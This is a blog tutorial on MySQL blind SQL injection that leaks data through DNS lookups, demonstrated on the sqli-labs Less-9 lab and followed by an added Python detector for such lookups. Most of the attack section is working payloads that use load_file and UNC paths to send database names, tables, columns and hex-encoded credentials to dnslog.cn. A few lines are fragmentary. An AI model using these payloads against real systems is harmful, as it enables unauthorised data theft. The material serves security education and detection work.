MySQL injection: blind injection via DNSlog, manual injection

Foreword

If DNSlog injection has to be classified, it belongs with the blind injection techniques, but it is more efficient than Boolean-based or time-based blind injection. In some environments, if we inject with Boolean-based or time-based blind injection, manual injection is a great help for bypassing the WAF, but it is very slow. We can use sqlmap instead, but many websites will put you on a blacklist so that you cannot reach them for a period of time, that is, they lock your IP. In that situation, if the website has a WAF, it is usually recommended to reduce the number of manual bypass attempts rather than buy proxies to run sqlmap through against the target, and to try DNSlog injection instead. DNSlog injection is still a form of blind injection, but it is far more efficient than Boolean-based or time-based blind injection: those two work character by character, whereas DNSlog injection can extract data in groups or whole rows at a time, so the overall efficiency is much higher.

# Prerequisites for DNSlog injection

Precondition: the target server has file read and write permission enabled (root permission). In MySQL terms this is the FILE privilege, and the secure_file_priv setting further limits which paths load_file() may read, so checking that setting is the first thing a defender should do.

(File upload and DNSlog injection share this prerequisite: if one of them can be done, the other can be done too, and if one cannot be done, neither can.)

# Key function

load_file():

This function reads a file and returns its content as a string. To use it, the file must be located on the server, the full path must be given, and the file permission must be granted. All bytes of the file are readable, but the file content must be smaller than max_allowed_packet.

Read the file haha.txt on the C drive:

load_file("c:\\haha.txt")

load_file() can read not only local paths but also files on other servers over the network.

# UNC path

Format: \\servername\sharename, where servername is the name of the server (it can be an IP address or a domain name) and sharename is the name of the shared resource. The UNC name of a directory or file can include the path under the shared name, in the format \\servername\sharename\filename.

Shared files overview: configure a shared folder, then access it with a UNC path such as \\192.168.222.142\share\1.txt, where:

\\192.168.222.142: the IP address

\share: the folder you need to access

\1.txt: the name of the file you need to access


# DNSlog principle

First, the attacker submits a malicious payload, which is effectively a path that makes the database access a UNC address on some server. The database processes it and, to reach that path, resolves its hostname through DNS. The DNS query is sent to the DNS server, where a log entry is generated. We can then check that log to see the result of the command that was executed.

Summary: the attacker submits an injection statement that makes the database splice the value to be queried together with a domain name and then issue a DNS query. We only need to obtain the DNS log to read the value we want. So we need our own domain name, configure an NS record for it at the domain registrar, and then read the DNS log from the NS server provider.


It is in this field (the hostname part of the UNC path), because normally an IP address or domain name is filled in at this position. So-called DNSlog injection simply fills in a domain name there.

For example, I write a domain name here.

Suppose we put a command that we want executed, (select database()), in front of it and use . to splice the two together.

When the database runs the query, it evaluates the (select database()) command first (the part in brackets has priority). Once (select database()) has been evaluated, its result, say the name of the current database, security, is spliced together with the domain name ctfstu.com and placed in front of it.

It then becomes a domain name like security.ctfstu.com.

The database then tries to resolve this domain name and access the file under it (the file itself is not the point).

The important part is the prefix: the content returned by the statement we injected, that is, the database information we wanted.

Note: (The instruction shown here is wrong, but it serves as an example.)


# Websites you need

1. http://ceye.io (if it is for personal use and does not change often, you can register an account here; it also has an API for tool-based injection)

2. http://www.dnslog.cn (used for the demonstration below)

# www.dnslog.cn tutorial

First click -> Get SubDomain

At this point it will give you a domain name:

1539yb.dnslog.cn

This domain name is randomly assigned to you.

Open a page.

Type anything in front of the domain name it configured for you, remembering to add a " . "

Then click -> Refresh Record

At this point you can see its resolution record.

Randomly generate a different

At this time, another

# Manual injection statement

and (select load_file(concat(1,2,3))) has three parameters in total:

1. "//" or '/'

2. The SQL statement to query

3. The DNS path plus any file name

For example:

and (select load_file(concat("//",(select database()),".4tp4b9.dnslog.cn/kk.txt")))

# Case demo

sqli-labs-master/Less-9

1. Determine whether there is an injection point and which character closes the query

Payload:

and sleep(5)

Since level nine is a time-based blind injection, we use a time delay to make the judgement. In real situations we choose the method according to the environment.

url: ?id=1' and sleep(5) --+

The page paused for 5 seconds, which shows the query is closed with a single quote '.

2. Get the current database

Payload:

and (select load_file(concat("//",(select database()), ".your domain name/any file name")))

url:

?id=1' and (select load_file(concat("//",(select database()),".par0nm.dnslog.cn/hh.txt"))) --+

After pressing Enter the page will load for a while; that is normal.

Open the web page of the DNS service you use and click Refresh Record.

At this point the name of the current database is obtained.

Database "security"

3. Get all data tables in the database

Payload:

?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit n,1),".domain name/random file name"))) --+

Query one data table at a time.

url:

?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 0,1),".par0nm.dnslog.cn/hhhh"))) --+

The first data table is: emails

Query the second data table

url: ?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 1,1),".par0nm.dnslog.cn/jjjjjsd")))--+

The second data table is: referers

Query the third data table

?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 2,1),".par0nm.dnslog.cn/jjjjjsd")))--+

The third data table is: uagents

Query the fourth data table

?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 3,1),".par0nm.dnslog.cn/jjjjjsd")))--+

The fourth data table is: users

4. Get all column (field) information

Payload:

and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name="table name" limit n,1), ".domain name/random file name"))) --+

Query the first field

?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1),".par0nm.dnslog.cn/sudhwi"))) --+

The first field: id

Query the second field

?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),".par0nm.dnslog.cn/sudhwi"))) --+

The second field: username

Query the third field

?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),".par0nm.dnslog.cn/sudhwi"))) --+

The third field: password

5. Extract the data

Get the contents of the username and password fields.

Because characters such as @ and ~ cannot appear in the hostname passed to load_file, we use concat_ws() to join the fields with a separator and then hex() to convert the result to hexadecimal; the value is decoded again once it shows up in the DNS log.

Payload:

and load_file(concat('\\\\', (select hex(concat_ws('~', field 1, field 2)) from data table limit n, 1), '.domain name\\file name'))-- +

url:

and load_file(concat('\\\\',(select hex(concat_ws('~',username,password)) from users limit 0,1),'.par0nm.dnslog.cn\\kjsjdhfuehfic'))--+

Convert the hex value back.

Conversion result:

umb~Dumb

Supplement: use limit 0,1 to view the data one row at a time.

limit 0 , 1; Explanation: start at offset 0 and return 1 row.

limit 1 , 1; Explanation: start at offset 1 and return 1 row.
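From the defender's side of the DNSlog principle above and of the hex-encoded extraction step just shown, here is an added Python example (not code from the original post): it scans resolver log lines for lookups to the DNSlog sinks this page names, takes the leftmost label, which is where load_file(concat(...)) places the query result, and decodes it when it is the output of hex(). The log line format, the sink list and the log lines themselves are constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample resolver log lines (not from the original post).
# Assumed format: "<timestamp> <client-ip> <query-name> <query-type>".
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.5 www.example.com A
2024-01-01T10:00:02 10.0.0.8 security.par0nm.dnslog.cn A
2024-01-01T10:00:03 10.0.0.8 users.par0nm.dnslog.cn A
2024-01-01T10:00:04 10.0.0.8 44756d627e44756d62.par0nm.dnslog.cn A
2024-01-01T10:00:05 10.0.0.9 mail.example.com MX
"""

# DNSlog sinks named on the page; extend with any domain you want to watch.
SINK_SUFFIXES = (".dnslog.cn", ".ceye.io")
HEX_LABEL = re.compile(r"^(?:[0-9a-fA-F]{2})+$")


@dataclass
class Finding:
    client: str             # host that made the lookup (the database server)
    qname: str              # full name that was resolved
    label: str              # leftmost label, where concat() put the query result
    decoded: Optional[str]  # label decoded from hex(), if it was hex


def decode_label(label: str) -> Optional[str]:
    """Reverse hex(concat_ws(...)): return the plaintext, or None if not hex."""
    if not HEX_LABEL.match(label):
        return None
    try:
        return bytes.fromhex(label).decode("utf-8")
    except UnicodeDecodeError:
        return None


def scan(log_text: str) -> List[Finding]:
    """Return one Finding per lookup whose name ends in a known DNSlog sink."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue                      # malformed line, skip it
        _ts, client, qname, _qtype = parts[:4]
        host = qname.rstrip(".").lower()
        if not host.endswith(SINK_SUFFIXES):
            continue
        label = host.split(".")[0]        # prefix spliced in by the payload
        findings.append(Finding(client, host, label, decode_label(label)))
    return findings
```

Feeding the sample log to scan() yields three findings from 10.0.0.8, the last of which decodes to Dumb~Dumb, so the client that appears as the source of such lookups is the database host to investigate.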


Origin blog.csdn.net/m0_72755466/article/details/129892314